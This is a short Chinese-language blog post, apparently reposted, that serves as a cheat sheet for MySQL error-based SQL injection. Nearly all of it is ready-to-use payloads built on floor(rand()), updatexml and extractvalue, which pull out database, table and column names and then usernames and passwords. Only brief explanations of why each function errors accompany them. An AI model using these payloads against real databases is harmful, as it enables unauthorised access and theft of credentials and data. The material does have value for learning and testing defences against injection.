标签:数据 extract rand 总结 HERE where color table ati
关于Floor报错注入原理可以看http://blog.51cto.com/wt7315/1891458
获取数据库
select count(*),(concat(0x3a,database(),0x3a,floor(rand()*2))) name from information_schema.tables group by name;
获取表名
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=‘bypass‘ limit 1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
获取字段名
select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name=‘pass‘ limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
获取内容
select count(*),concat(0x3a,0x3a,(select username from pass limit 1,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
updatexml的爆错原因很简单,updatexml第二个参数需要的是Xpath格式的字符串。我们输入的显然不符合。故报错由此报错。
获取数据库
select updatexml(0,concat(0x7e,(select database())),0);
获取表名
select updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0);
获取字段
select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name=‘pass‘ limit 1,1)),0);
获取内容
select updatexml(0,concat(0x7e,(SELECT concat(password) FROM pass limit 0,1)),0);
select extractvalue(1,concat(0x7e,(select user()),0x7e));
剩下的就不一一列出来了,有兴趣的可以去查一下
标签:数据 extract rand 总结 HERE where color table ati
原文地址:https://www.cnblogs.com/98Lucifer/p/9168868.html
